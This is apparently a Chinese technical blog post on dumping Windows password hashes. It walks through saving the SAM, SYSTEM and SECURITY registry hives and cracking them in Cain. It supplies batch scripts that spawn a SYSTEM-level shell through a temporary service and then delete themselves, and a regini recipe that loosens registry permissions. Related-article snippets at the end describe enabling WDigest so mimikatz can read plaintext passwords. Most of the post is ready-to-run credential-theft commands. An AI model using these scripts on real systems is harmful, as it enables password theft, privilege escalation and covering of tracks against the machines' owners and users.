导出系统注册表抓Hash的思路整理

最新推荐文章于 2024-01-11 11:17:04 发布
最新推荐文章于 2024-01-11 11:17:04 发布
阅读量3k 收藏 3
点赞数
分类专栏: 提权 文章标签: security system cmd 破解 delete 测试
首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的,
reg save hklm\sam sam.hive 
reg save hklm\system ystem.hive 
reg save hklm\security security.hive 

然后把 sam.hive,system.hive,security.hive下载回本地,打开 CAIN,在"Decoders"标签下,点"LSA Secrets", 点"+"来导入 system.hive和 security.hive. 
==============================
要破解 LM/NTLM hash,首先点"cracker"标签下的"LM&NTLM hashes",然后点"+",导入 sam.hive,注意由于现在的 win2000以后都默认使用了 syskey,所以还要导入 system.hive中的 syskey的值,然后就可以彩虹表破解了。
==============================
1、以下是TheLostMind的思路

         对用户权限要求,默认XP SP3是导出不了的,我本地测试了,但是system权限是可以的,那么咱可以创建一个system权限运行的CMD,然后再导出就OK了。
其他系统上面没测试过,大家自己整吧。
首先创建一个系统权限执行的CMD:
======================StartSystemCmd.bat=========
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
=======================END=========================
然后导出文件。
==================SaveReg.bat=======================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive 
reg save hklm\security security.hive
del %0
=====================END============================
然后倒入到CAIN里面破吧。

2、我的思路

有时我们不方便再跳出一个CMD,这时可以利用命令regini.exe修改注册表的访问权限。
首先新建一个文本文件pri.ini,内容如下:
===========pri.ini===================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================================
然后执行 regini.exe pri.ini 

写成批处理的内容如下:
================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini
regini.exe pri.ini
del pri.ini
================================
注:以上操作是将hklm\security与hklm\sam赋予Administrators和System完全访问的权限。hklm\system一般对管理员是放开访问的,可视情况修改。以上两个表项对系统登陆至关重要,请谨慎修改。

最后就可以直接利用reg导出注册表内容。
fengling132
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows获hash常见手法,你知道吗?
logic1001的博客
03-22 1415
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获到密码了。
注册表Windows-hash方法-到-远程HASH注入.docx
10-10
注册表Windows-hash方法-到-远程HASH注入.docx
注册表windows hash
lansefly1990的专栏
06-30 1110
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f #重启或用户重新登录后可以成功 cmd修改注册表命令: 1、从注册表windows hash reg save hklm\sa
横向移动之windows登录账号密码导出
good good study
02-16 2856
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中明文密码。此时可以通过修改注册表的方式明文,但需要用户重新登录后才能成功
win10提并解密sam文件中的hash
feigerger的博客
07-07 4967
win10密码破解,提SAM文件
系统用户hash
08-27
##### 步骤一:导出注册表 首先,需要导出包含用户账户信息的注册表项。可以使用以下命令: ```cmd regsave "HKEY_LOCAL_MACHINE\SAM" "sam.hive" regsave "HKEY_LOCAL_MACHINE\SYSTEM" "system.hive" regsave "HKEY...
java开源包5
06-28
Spring4GWT GWT Spring 使得在 Spring 框架下构造 GWT 应用变得很简单,提供一个易于理解...可以将网络图导出为 GIF, JPEG, PNG, PPM, ARP and PNML (XML based)文件格式。使用了优秀的JHotDraw 5.2 框架。 activemq...
#资源分享达人# 红蓝对抗之Windows内网渗透.zip
08-03
9. **持久性机制**:利用注册表键、服务、任务计划程序等方式确保攻击者能在系统重启后重新获得控制权。 10. **蓝队防御策略**:了解防御者可能采用的手段,如入侵检测系统(IDS)、防火墙、日志审计、安全信息和...
God.org单域环境攻略(二)1
08-08
- **samdump2** 是另一个工具,用于从注册表的"HKEY_LOCAL_MACHINE\SAM"、"HKEY_LOCAL_MACHINE\System"和"HKEY_LOCAL_MACHINE\Security"键中导出用户和口令的哈希值。虽然可以得到mary的哈希值,但域用户如GOD\mary...
WindowsHash简介及windows认证
qq_58000413的博客
04-23 1638
Windows系统使用两种方法对用户的密码进行哈希处理,他们分别是LAN Manager()哈希和NT LAN Manager()哈希。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows的系统密码hash默认情况下一般由两个部分组成:第一部分是LM-hash,第二部分是NTLM-hashwindows加密过的密码口令,我们称为hash,windows的系统密码hash默认情况下一般由两个部分组成:第一部分是LM-hash,第二部分NTLM-hash
Windows系统散列值获分析
weixin_45007073的博客
06-25 972
系统散列值获分析LM Hash和NTLM Hash单机密码与防范GetpassPwDump7QuarksPwDump导出SAM和System文件读SAM和System文件获得NTLM Hash LM Hash和NTLM Hash Windows操作系统使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在ntds.dit中,加密后为散列值。 操作系统的密码一般分为两部分,一部分是LM Hash,另一部分是NTLM HashHash的结构如下username:RID:LM-HASH:N
内网渗透测试理论学习之第四篇内网渗透域的横向移动
千寻的博客
03-01 2282
一、IPC 二、HashDump 三、PTH 四、PTT 五、PsExec 六、WMI 七、DCOM 八、SPN 九、Exchange
windows获hash常见手法
最新发布
Python_0011的博客
01-11 1085
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Windows密码凭证获学习
crowsec
08-08 4602
一般来说,在我们获到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
内网渗透-windows获(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1842
当获一台域内主机权限时,接下来的渗透思路就是要获更高权限的账号,用来访问域控或横向拓展,那么在获本地用户、域用户凭证和获域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获登录凭证的手法。
Windwos密码导出的几种姿势
热门推荐
Matthew
09-14 1万+
这篇文章主要是介绍怎么在本地提用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。 要免杀: 1.Getapss Getapss是由闪电小子根据mimikatz编译的一个工具,可以获明文密码。现在有32位和64位了,直接运行getpass.exe。 2.QuarksPwDu
内网渗透之内网信息收集(六)
墨鱼菜鸡
09-10 369
目录 凭证信息收集 05wce 06pwddump7 07ophcrack 08Procdump+Mimikatz (常用免杀) 09注册表导出hash 10lazagne 内网渗透之内网信息收集(七)_不知名白帽的博客-CSDN博客 凭证信息收集 05wce WCE:windows credentials editor WCE...
本机 hash(注册表)
weixin_30562507的博客
05-11 283
Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg 注意权限问题,一般注册表默认sam目...
Gardino:Geo-Hash技术驱动的温室监测与追踪系统
"使用Geo-Hash的温室监控和跟踪系统" 本文主要介绍了一种名为Gardino的温室监控和跟踪系统,该系统结合了现代农业与计算机技术,旨在满足消费者对有机植物产品的需求以及对种植过程的透明化要求。在面对全球气候...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值